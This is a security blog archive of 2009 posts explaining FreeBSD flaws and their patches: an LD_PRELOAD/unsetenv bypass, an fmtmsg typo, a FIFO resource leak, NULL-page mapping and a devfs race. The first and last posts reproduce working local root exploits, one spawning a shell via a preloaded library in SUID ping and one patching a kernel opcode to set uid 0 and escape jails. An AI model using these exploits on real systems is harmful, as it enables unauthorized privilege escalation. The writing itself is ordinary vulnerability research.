xorl %eax, %eax

Archive for the ‘freebsd’ Category

FreeBSD LD_PRELOAD Security Bypass

with 8 comments

A few hours ago, kingcope (aka. Nikolaos Rangos) released a 0day exploit for FreeBSD that results in instant privilege escalation. The vulnerability resides in the Run-Time Dynamic Loader’s code which can be found at libexec/rtld-elf/rtld.c. In case you’re not aware, LD_PRELOAD environment variable is used to instruct the RTLD to use some additional library (shared object) which will be pre-loaded. However, for security purposes this environment variable is normally ignored on SUID/SGID binaries. Now, let’s move to the susceptible code…

_rtld(Elf_Addr *sp, func_ptr_type *exit_proc, Obj_Entry **objp)
    Elf_Auxinfo *aux_info[AT_COUNT];
    int i;
    trust = !issetugid();
     * If the process is tainted, then we un-set the dangerous environment
     * variables.  The process will be marked as tainted until setuid(2)
     * is called.  If any child process calls setuid(2) we do not want any
     * future processes to honor the potentially un-safe variables.
    if (!trust) {
        unsetenv(LD_ "PRELOAD");
        unsetenv(LD_ "LIBMAP");
        unsetenv(LD_ "LIBRARY_PATH");
        unsetenv(LD_ "LIBMAP_DISABLE");
        unsetenv(LD_ "DEBUG");
        unsetenv(LD_ "ELF_HINTS_PATH");
    /* Return the exit procedure and the program entry point. */
    *exit_proc = rtld_exit;
    *objp = obj_main;
    return (func_ptr_type) obj_main->entry;

So, in case of a SUID/SGID binary, it will unset some LD_ environment variables that are considered a possible threat. This is done using unsetenv(3) function which a library routine from the ‘stdlib’. If we have a look at this routine we’ll see that it could fail (from src/lib/libc/stdlib/getenv.c)…

 * Unset variable with the same name by flagging it as inactive.  No variable is
 * ever freed.
unsetenv(const char *name)
	int envNdx;
	size_t nameLen;

	/* Check for malformed name. */
	if (name == NULL || (nameLen = __strleneq(name)) == 0) {
		errno = EINVAL;
		return (-1);

	/* Initialize environment. */
	if (__merge_environ() == -1 || (envVars == NULL && __build_env() == -1))
		return (-1);

	/* Deactivate specified variable. */
	envNdx = envVarsTotal - 1;
	if (__findenv(name, nameLen, &envNdx, true) != NULL) {
		envVars[envNdx].active = false;
		if (envVars[envNdx].putenv)
		__rebuild_environ(envActive - 1);

	return (0);

What this code does is to check for a malformed name which if it’s either NULL or has zero length it’ll immediately return with ‘EINVAL’. Next, it will invoke __merge_environ() and __build_env() to initialize the environment array. Next, is the most interesting part, the call to __findenv() is used to initialize the ‘envNdx’ with a value associated with the passed name. That index value is used to remove the environment variable from the array, however, a look at __findenv() reveals that it could also fail…

static inline char *
__findenv(const char *name, size_t nameLen, int *envNdx, bool onlyActive)
	int ndx;

	 * Find environment variable from end of array (more likely to be
	 * active).  A variable created by putenv is always active or it is not
	 * tracked in the array.
	for (ndx = *envNdx; ndx >= 0; ndx--)
		if (envVars[ndx].putenv) {
			if (strncmpeq(envVars[ndx].name, name, nameLen)) {
				*envNdx = ndx;
				return (envVars[ndx].name + nameLen +
				    sizeof ("=") - 1);
		} else if ((!onlyActive || envVars[ndx].active) &&
		    (envVars[ndx].nameLen == nameLen &&
		    strncmpeq(envVars[ndx].name, name, nameLen))) {
			*envNdx = ndx;
			return (envVars[ndx].value);

	return (NULL);

So, if this fails, the result will be exiting from unsetenv(3) with an error. Now if we move back to the _rtld() we’ll see that in none of those LD_ routines there’s a return value check of the unsetenv(3) calls! This allows a user to trigger an error in __findenv() in order to abort the removal of the environment variable.
By doing this, the RTLD will assume that the LD_ environment variable has been removed and proceed with loading the binary but the variable would still be there since unsetenv(3) failed to remove it! This allows us to pre-load arbitrary libraries to SUID/SGID binaries which results in a straightforward privilege escalation.
In his exploit code, kingcope does the following…

echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>

main() {
        extern char **environ;
        environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        execl("/sbin/ping", "ping", 0);
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        extern char **environ;
        system("echo ALEX-ALEX;/bin/sh");
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0

This is a simple shell script that will first compile env.c file which is setting the environment array to some uninitialized heap space in order to trigger the failure of unsetenv(3) and he also sets the first argument to “LD_PRELOAD=/tmp/w00t.so.1.0” to allow the RTLD load this library. Finally, it executes a SUID binary, in this case /sbin/ping.
The second binary is the library that will be pre-loaded during the execution of /sbin/ping which is used to set the environment array to NULL and just spawn a shell at its start up.
In addition to this, as spender noticed, the uninitialized heap area could contain a “=” character and this will result in assuming that this is another environment variable. So, you can either do something like this or something like that.
To conclude, the patch has already been developed as you can read in this official email, and as you might have been expecting it just checks the return values like this:

     if (!trust) {
-        unsetenv(LD_ "PRELOAD");
-        unsetenv(LD_ "LIBMAP");
-        unsetenv(LD_ "LIBRARY_PATH");
-        unsetenv(LD_ "LIBMAP_DISABLE");
-        unsetenv(LD_ "DEBUG");
-        unsetenv(LD_ "ELF_HINTS_PATH");
+        if (unsetenv(LD_ "PRELOAD") || unsetenv(LD_ "LIBMAP") ||
+	    unsetenv(LD_ "LIBRARY_PATH") || unsetenv(LD_ "LIBMAP_DISABLE") ||
+	    unsetenv(LD_ "DEBUG") || unsetenv(LD_ "ELF_HINTS_PATH")) {
+		_rtld_error("environment corrupt; aborting");
+		die();
+	}
     ld_debug = getenv(LD_ "DEBUG");

This kingcope’s discovery is really unbelievable… Everyone is looking for amazingly complex vulnerabilities when there are such simple bugs out there…
Congrats for your discovery kcope

As spender noticed, I didn’t provide details of __merge_environ(), however, this is the main reason that this bug is exploitable since this function will “scan” the environment array like this:

static int
	char **env;
	char *equals;
		origEnviron = environ;
		if (origEnviron != NULL)
			for (env = origEnviron; *env != NULL; env++) {
				if ((equals = strchr(*env, '=')) == NULL) {
					__env_warnx(CorruptEnvValueMsg, *env,
					errno = EFAULT;
					return (-1);
				if (__setenv(*env, equals - *env, equals + 1,
				    1) == -1)
					return (-1);

	return (0);

As you can read, it checks for “=” character which is why is the environment passed to it.

Written by xorl

December 1, 2009 at 03:08

FreeBSD fmtmsg(3) Typo

with one comment

This is a funny bug reported by soulcatcher to the FreeBSD project. The vulnerable code resides in gen/fmtmsg.c and specifically in printfmt() routine as you can see below.

 * Returns NULL on memory allocation failure, otherwise returns a pointer to
 * a newly malloc()'d output buffer.
static char *
printfmt(char *msgverb, long class, const char *label, int sev,
    const char *text, const char *act, const char *tag)
        size_t size;
        char *comp, *output;
        const char *sevname;
        size = 32;
        if (text != MM_NULLTXT)
                size += strlen(text);
        if (text != MM_NULLACT)
                size += strlen(act);
        if ((output = malloc(size)) == NULL)
        return (output);

This could be reached directly using fmtmsg(3).
The problem here is in the ‘MM_NULLACT’ case (which checks if ‘act’ is set to “NULL” or not), which is incorrectly using ‘text’ argument even though it updates the size variable using ‘act’. The advisory included a small PoC trigger C code which you can see here.

#include <fmtmsg.h>

int main(int argc, char * argv[])
fmtmsg(MM_UTIL | MM_PRINT, "BSD:ls", MM_ERROR,
"illegal option -- z", MM_NULLACT, "BSD:ls:001");
return 0;

It is quite simple, it has a ‘text’ argument set to “illegal option — z” and ‘act’ set to MM_NULLACT. This will attempt to add the length of that ‘MM_NULLACT’ to the ‘size’ and eventually, result in a segmentation fault.
The fix was, as you might have guessed…

         if (text != MM_NULLTXT)
                 size += strlen(text);
-        if (text != MM_NULLACT)
+        if (act != MM_NULLACT)
                 size += strlen(act);

It just checks the correct argument before updating the size that will be later allocated.

Written by xorl

November 12, 2009 at 23:09

FreeBSD FIFO Resource Leak

leave a comment »

I just read this email on freebsd-bugs mailing list. The bug was discovered and reported by Chitti Nimmagadda and Dorr H. Clark of Santa Clara University. Here is the vulnerable code as seen in usr/src/sys/fs/fifofs/fifo_vnops.c of FreeBSD 8.0-STABLE release.

 * Open called to set up a new instance of a fifo or
 * to find an active instance of a fifo.
static int
        struct vop_open_args /* {
                struct vnode *a_vp;
                int  a_mode;
                struct ucred *a_cred;
                struct thread *a_td;
                struct file *a_fp;
        } */ *ap;
        struct vnode *vp = ap->a_vp;
        struct fifoinfo *fip;
        struct thread *td = ap->a_td;
        struct ucred *cred = ap->a_cred;
        struct file *fp = ap->a_fp;
        struct socket *rso, *wso;
        int error;
         if ((fip = vp->v_fifoinfo) == NULL) {
         if (ap->a_mode & FWRITE) {
                 if ((ap->a_mode & O_NONBLOCK) && fip->fi_readers == 0) {
                         return (ENXIO);
                 if (fip->fi_writers == 1) {
                         fip->fi_readsock->so_rcv.sb_state &= ~SBS_CANTRCVMORE;
                         if (fip->fi_readers > 0) {
                 if ((ap->a_mode & FWRITE) && fip->fi_readers == 0) {
                         VOP_UNLOCK(vp, 0);
                         error = msleep(&fip->fi_writers, &fifo_mtx,
                             PDROP | PCATCH | PSOCK, "fifoow", 0);
                         vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
                         if (error) {
                                 if (fip->fi_writers == 0) {
                                 return (error);

In this code, ‘vp’ pointer is used to store a ‘vnode’ structure (defined in sys/vnode.h). The bug is a missing clean up of that structure before returning. As you can read in last ‘if’ clause, in case of an error in msleep(), it will decrement the writers’ reference counter, and if there are no others left, it will lock the socket descriptor ‘fip->fi_readsock’ using socantrcvmore(), then start a MUTEX lock to increment ‘fip->fi_wgen’ counter and finally, call fifo_cleanup() on ‘vp’ pointer to dispose the FIFO resources like this:

 * Dispose of fifo resources.
static void
fifo_cleanup(struct vnode *vp)
        struct fifoinfo *fip = vp->v_fifoinfo;
        ASSERT_VOP_ELOCKED(vp, "fifo_cleanup");
        if (fip->fi_readers == 0 && fip->fi_writers == 0) {
                vp->v_fifoinfo = NULL;
                free(fip, M_VNODE);

However, in fifo_open() the ‘if’ clause for ‘ap->a_mode & FWRITE’, in case of non-blocking mode on that FIFO and a readers’ reference counter equal to zero it will unlock the FIFO MUTEX and return ENXIO (aka. Device not configured) without releasing the resource. This results in a resource leak.
The suggested patch as we can read in the original advisory, is to add the missing clean-up function.

                if ((ap->a_mode & O_NONBLOCK) && fip->fi_readers == 0) {
+                       /* Exclusive VOP lock is held - safe to clean */
+                       fifo_cleanup(vp);
                        return (ENXIO);

At last, the authors of the advisory provide a PoC code to demonstrate the vulnerability. Here is a quick review of that code…

#include <stdio.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

#define FIFOPATH "/tmp/fifobug.debug"

void getsysctl(name, ptr, len)
    const char *name;
    void *ptr;
    size_t len;
    size_t nlen = len;
    if (sysctlbyname(name, ptr, &nlen, NULL, 0) != 0) {
                printf("name: %s\n", name);
    if (nlen != len) {
        printf("sysctl(%s...) expected %lu, got %lu", name,
            (unsigned long)len, (unsigned long)nlen);

This function is used as a wrapper around sysctlbyname(3) library routine. The following code is this…

main(int argc, char *argv[])
	int acnt = 0, bcnt = 0, maxcnt;
	int fd;
	unsigned int maxiter;
	int notdone = 1;
	int i= 0;

	getsysctl("kern.ipc.maxsockets", &maxcnt, sizeof(maxcnt));
	if (argc == 2) {
		maxiter = atoi(argv[1]);
	} else {
		maxiter = maxcnt*2;

They retrive the maximum IPC socket number using the previous wrapper routine and set ‘maxiter’ to that value multiplied by two unless the user specified a value through the first argument of the program. The next code is this.

	printf("Max sockets: %d\n", maxcnt);
	printf("FIFO %s will be created, opened, deleted %d times\n", 
		FIFOPATH, maxiter);

	getsysctl("kern.ipc.numopensockets", &bcnt, sizeof(bcnt));

They unlink the “/tmp/fifobug.debug” file and after some printf(3)s, they store the number of the open IPC sockets to ‘bcnt’ variable. Next part is…

	while(notdone && (i++ < maxiter)) {
		if (mkfifo(FIFOPATH, 0) == 0) {
		if ((fd <= 0) && (errno != ENXIO)) {
			notdone = 0;

This loop will iterate as long as it has not reached more than ‘maxiter’ (maximum IPC socket number multiplied by two) times and flag ‘notdone’ is non-zero. Inside the ‘while’ loop, it creates a FIFO in the previously unlinked file and sets its mode accordingly. Then, it opens that FIFO as write only and non-blocking and then it just unlinks it. If the open(2) system call returns ‘ENXIO’, flag ‘notdone’ is zeroed out. This is a simple code to reach the fiflo_open() bug discussed above since the FIFO created is on write and non-blocking mode and it has no readers on it.
Finally, the code continues…

	getsysctl("kern.ipc.numopensockets", &acnt, sizeof(acnt));
	printf("Open Sockets: Before Test: %d, After Test: %d, diff: %d\n",
		 bcnt, acnt, acnt - bcnt);
	if (notdone) {
		printf("FIFO/socket bug is fixed\n");
	} else {
		printf("FIFO/socket bug is NOT fixed\n");

Just some printf(3)s of the number of open IPC sockets using the sysctl(3) interface and an informative message if the system had returned ‘ENXIO’ (meaning it’s buggy) and consequently zeroed out ‘notdone’ or not.

Written by xorl

November 6, 2009 at 03:57

FreeBSD-EN-09:05: NULL Pointer Mapping

leave a comment »

This is a serious issue and to begin with, credits for this advisory go to John Baldwin, Konstantin Belousov, Alan Cox, and Bjoern Zeeb. The bug affects all of the FreeBSD releases prior to that patch. The concept is that user space processes have no limitation in mapping the location of NULL pointer and this results in perfectably exploitable conditions for NULL pointer dereference vulnerabilities. For example, if a kernel process attempts to access data in NULL or an offset of it because of a NULL pointer dereference, a user could map that address and inject malicious data that could lead to code execution in the context of the kernel.
To fix this, a patch was developed which adds a new sysctl(8) option like this…

static int map_at_zero = 1;
TUNABLE_INT("security.bsd.map_at_zero", &map_at_zero);
SYSCTL_INT(_security_bsd, OID_AUTO, map_at_zero, CTLFLAG_RW, &map_at_zero, 0,
    "Permit processes to map an object at virtual address 0.");

This is inserted in sys/kern/kern_exec.c and it initializes a new sysctl named “security.bsd.map_at_zero” that uses the static integer ‘map_at_zero’ which by default is set to 1. From the SYSCTL_INT() we can easily deduce that by default it is allowed to perform mappins in virtual address 0 since it is set to 1. To disable the NULL mappings users could use something like:


In their /boot/loader.conf or /etc/sysctl.conf. Function exec_new_vmspace() from kern/kern_exec.c which is responsible for destroying the old address space and allocating new stack was also changed to include a new variable:

 	struct vmspace *vmspace = p->p_vmspace;
-	vm_offset_t stack_addr;
+	vm_offset_t sv_minuser, stack_addr;
 	vm_map_t map;

and a virtual memory check was updated like this:

 	map = &vmspace->vm_map;
-	if (vmspace->vm_refcnt == 1 && vm_map_min(map) == sv->sv_minuser &&
+	if (map_at_zero)
+		sv_minuser = sv->sv_minuser;
+	else
+		sv_minuser = MAX(sv->sv_minuser, PAGE_SIZE);
+	if (vmspace->vm_refcnt == 1 && vm_map_min(map) == sv_minuser &&
 	    vm_map_max(map) == sv->sv_maxuser) {
 		vm_map_remove(map, vm_map_min(map), vm_map_max(map));
 	} else {
-		error = vmspace_exec(p, sv->sv_minuser, sv->sv_maxuser);
+		error = vmspace_exec(p, sv_minuser, sv->sv_maxuser);
 		if (error)

The initial check required that VM reference count is set to 1, the minimum VM mapping would be equal to ‘sv_minuser’ and the maximum VM mapping equal to ‘sv->sv_maxuser’. As we can read from sys/sysent.h, ‘sv_minuser’ and ‘sv_maxuser’ represent:

struct sysentvec {
        int             sv_size;        /* number of entries */
        vm_offset_t     sv_minuser;     /* VM_MIN_ADDRESS */
        vm_offset_t     sv_maxuser;     /* VM_MAXUSER_ADDRESS */

So, the above check was simply checking the boundaries of the VM. The new check is using the newly added ‘map_at_zero’ varible, and if it contains a non-zero value, it initializes ‘sv_minuser’ with the user requested ‘sv->sv_minuser’. Otherwise, it will use the maximum allowable for that page address. Meaning, in a request similar to NULL, the result would be:

MAX(0x0, 0x1000) = 0x1000

The old check was inserted after the NULL mapping check as you can see in the above diff file. In addition to this, the else clause of that check was changed to use the appropriate min/max VM address values since the old one was using the user controlled ones directly.
This is the first protection against NULL pointer mappings in FreeBSD and I think it didn’t get the attention it should…

Written by xorl

October 15, 2009 at 21:01

FreeBSD-SA-09:14: Devfs/VFS NULL Pointer Race Condition

with 4 comments

This is a recently disclosed vulnerability, discovered by Polish researcher Przemyslaw Frasunek. The issue affects FreeBSD 6.x as well as 7.x releases and it is located in the sys/fs/devfs/devfs_vnops.c which is a code written by the famous Poul-Henning Kamp and includes the VNOP functions for devfs filesystem. Here is the vulnerable code from 7.2 release of FreeBSD:

static int
devfs_fp_check(struct file *fp, struct cdev **devp, struct cdevsw **dswp)

         *dswp = devvn_refthread(fp->f_vnode, devp);
         if (*devp != fp->f_data) {
                 if (*dswp != NULL)
                 return (ENXIO);
         KASSERT((*devp)->si_refcount > 0,
             ("devfs: un-referenced struct cdev *(%s)", devtoname(*devp)));
         if (*dswp == NULL)
                 return (ENXIO);
         curthread->td_fpop = fp;
         return (0);

P. Frasunek noticed that in devfs_open() of the same file, ‘fp->f_vnode’ is not initialized and thus, remains with value of zero during the execution of the above code. This routine uses devvn_refthread() to initialize the ‘dswp’ pointer. Then, if ‘devp’ (which is the pointer to the requested device) isn’t NULL it will release the device thread using ‘dev_relthread()’ and return with ENXIO (aka. Device not configured), otherwise, it will assert() that ‘(*devp)->si_refcount’ (which contains the number of references to that structure) is greater than zero, and if ‘dswp’ is NULL, it will immediately return with ENXIO. In any other case, it will initialize ‘curthread->td_fpop’ with ‘fp’. curthread points to the FS:[0] (on IA-32) or GS:[0] (on x86_64) segment selector which has the currently executing thread’s structure (aka. struct thread), and ‘td_fpop’ as we can read from sys/proc.h contains the file referencing cdev under op.
Now, a closer look to dev_relthread() which is called in case of a non-NULL device pointer can be found at kern/kern_conf.c and does this:

dev_relthread(struct cdev *dev)
         mtx_assert(&devmtx, MA_NOTOWNED);
         KASSERT(dev->si_threadcount > 0,
            ("%s threadcount is wrong", dev->si_name));

Basically, it simply decrements the thread’s counter by one in a lock. The second routine that is being called in devfs_fp_check() is the devvn_refthread() which is used to initialize ‘dswp’ pointer. This is probably the most interesting one…

struct cdevsw *
devvn_refthread(struct vnode *vp, struct cdev **devp)
         struct cdevsw *csw;
         struct cdev_priv *cdp;
         mtx_assert(&devmtx, MA_NOTOWNED);
         csw = NULL;
         *devp = vp->v_rdev;
         if (*devp != NULL) {
                 cdp = (*devp)->si_priv;
                 if ((cdp->cdp_flags & CDP_SCHED_DTR) == 0) {
                         csw = (*devp)->si_devsw;
                         if (csw != NULL)
         return (csw);

It takes a vnode and a cdev structures as arguments, and after a simple assertion, it locks the device and sets the device pointer to ‘vp->v_rdev’. Since, ‘fp->f_vnode’ was not properly initialized in devfs_open() and it is directly used as the first argument of devvn_refthread(), this will result in a NULL pointer dereference and ‘devp’ will be pointing to NULL->v_rdev which as P. Frasunek discovered. Next, if ‘devp’ isn’t NULL (which is our case), it will initialize ‘cdp’ with ‘(*devp)->si_priv’, and check the CDP_SCHED_DTR and if set, initialize ‘csw’ to ‘(*devp)->si_devsw’. At last, if this is not NULL, it will increment ‘(*devp)->si_threadcount++’.
This final operation allows the modification of an arbitrary user controlled location but unfortunately, it is restored in its original value through the decrement that dev_relthread() does when called in devfs_fp_check(). Nevertheless, P. Frasunek managed to code a really awesome exploit code for that vulnerability. Before moving on with the analysis of his exploit code, here is how it was patched by the FreeBSD guys:

 		fp->f_data = dev;
+		fp->f_vnode = vp;

A simple initialization of ‘fp->f_vode’ in devfs_open() was enough.
Now, to the exploit code…

int main(void) {
	int i;
	pthread_t pth, pth2;
	struct cdev devp;
	char *p;
	unsigned long *ap;

	/* 0x1c used for vp->v_rdev dereference, when vp=0 */
	/* 0xa5610e8 used for vp->r_dev->si_priv dereference */
	/* 0x37e3e1c is junk dsw->d_kqfilter() in devfs_vnops.c:650 */

	unsigned long pages[] = { 0x0, 0xa561000, 0x37e3000 };
	unsigned long sizes[] = { 0xf000, 0x1000, 0x1000 }; 

His comments are really useful here. Those two arrays contain the pointers and their equivalent sizes which are described in detail in the comments. The following code is:

	for (i = 0; i < sizeof(pages) / sizeof(unsigned long); i++) {
		printf("[*] allocating %p @ %p\n", sizes[i], pages[i]);
		if (mmap((void *)pages[i], sizes[i], PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) == MAP_FAILED) {
			return -1;

This loop is used to allocate the appropriate addresses described earlier in the ‘pages[]’ and their equivalent ‘sizes[]’ arrays using mmap(2) system call. The next part of main() is…

#define JE_ADDRESS 0xc076c62b

/* location of "je" (0x74) opcode in devfs_fp_check() - it will be incremented
 * becoming "jne" (0x75), so error won't be returned in devfs_vnops.c:648
 * and junk function pointer will be called in devfs_vnops.c:650
 * you can obtain it using:
 * $ objdump -d /boot/kernel/kernel | grep -A 50 \<devfs_fp_check\>: | grep je | head -n 1 | cut -d: -f1


	*(unsigned long *)0x1c = (unsigned long)(JE_ADDRESS - ((char *)&devp.si_threadcount - (char *)&devp));

	p = (char *)pages[2];
	ap = (unsigned long *)p;

	for (i = 0; i < sizes[2] / 4; i++)
		*ap++ = (unsigned long)&kernel_code;

So, he’s using a JE instruction in devfs_fp_check() as its target for the increment/decrement race condition and ‘ap’ is initialized to point to ‘pages[2]’ which has the address of ‘dsw->d_kqfilter()’ routine. This is filled with the contents of kernel_code() which is this:

static void kernel_code(void) {
	struct thread *thread;
	gotroot = 1;
		"movl %%fs:0, %0"
		: "=r"(thread)
	thread->td_proc->p_ucred->cr_uid = 0;
	thread->td_proc->p_ucred->cr_prison = NULL;


It retrieves the current thread structure on IA-32 systems (on X86_64 he should be using %%gs:0), and sets the current thread’s UID to that of root (aka. 0) and the pointer to a possible jail that is being running for the current thread to NULL to escape from a jail environment.
Back to main() we have…

	if ((kq = kqueue()) < 0) {
		return -1;

	pthread_create(&pth, NULL, (void *)do_thread, NULL);
	pthread_create(&pth2, NULL, (void *)do_thread2, NULL);

	timeout.tv_sec = 0;
	timeout.tv_nsec = 1;

	printf("waiting for root...\n");
	i = 0;

	while (!gotroot && i++ < 10000)

He initializes ‘kq’ using kqueue() system call and he creates two threads that will execute do_thread() and do_thread2() respectively, then, he initializes a timespec structure and at last, doing a simple sleeping loop to wait for the threads to gain execution in the kernel context. Here is the code of do_thread():

void do_thread(void) {

	while (!gotroot) {
		memset(&kev, 0, sizeof(kev));
		EV_SET(&kev, fd, EVFILT_READ, EV_ADD, 0, 0, NULL);

		if (kevent(kq, &kev, 1, &ke, 1, &timeout) < 0)



As long as it has not gained root access, it will initialize a kevent structure using EV_SET() macro setting the changelist to fd with an EVFILT_READ event (which means that it will return when there are data available to read from fd) and EV_ADD to add the event to the kqueue. Finally, it will invoke kevent() on the previously set event.
Now, do_thread2() goes like this:

void do_thread2(void) {
	while(!gotroot) {
		/* any devfs node will work */
		if ((fd = open("/dev/null", O_RDONLY, 0600)) < 0)



While it has not gain root access, it will open a device in ‘fd’ file descriptor and then close it. At last, the final gone of main() routine is:


	if (getuid()) {
		printf("failed - system patched or not MP\n");
		return -1;

	execl("/bin/sh", "sh", NULL);

	return 0;

So, if it is able to set its UID to 0 it will spawn a shell which would be a root-shell. :)
The goal of this exploit code is to follow these steps:
1) place the JE instruction of devfs_fp_check() to the location that the increment will take place
2) Open a device to trigger the increment. This will make the JE (which is 0x74) to JNE (which is 0x75) and this results in the invocation of dsw->d_kqfilter() as we can see here:

static int
devfs_kqfilter_f(struct file *fp, struct knote *kn)
         struct cdev *dev;
         struct cdevsw *dsw;
         int error;
         struct file *fpop;
         struct thread *td;
         td = curthread;
         fpop = td->td_fpop;
         error = devfs_fp_check(fp, &dev, &dsw);
         if (error)
                return (error);
         error = dsw->d_kqfilter(dev, kn);
         td->td_fpop = fpop;
         return (error);

Where obviously, the JE is the if (error) check.

3) The kernel will jump to dsw->d_kqfilter() but this is where kernel_code() resides and leads to privilege escalation and possible jail escape.

By doing so, P. Frasunek avoids the dev_relthread() (the decrement) in devfs_kqfilter_f() as you can clearly see. The two threads are used to reach that race window of the increment/decrement using kevent() on the ‘fd’ and opening/closing the ‘fd’.

Written by xorl

October 13, 2009 at 23:17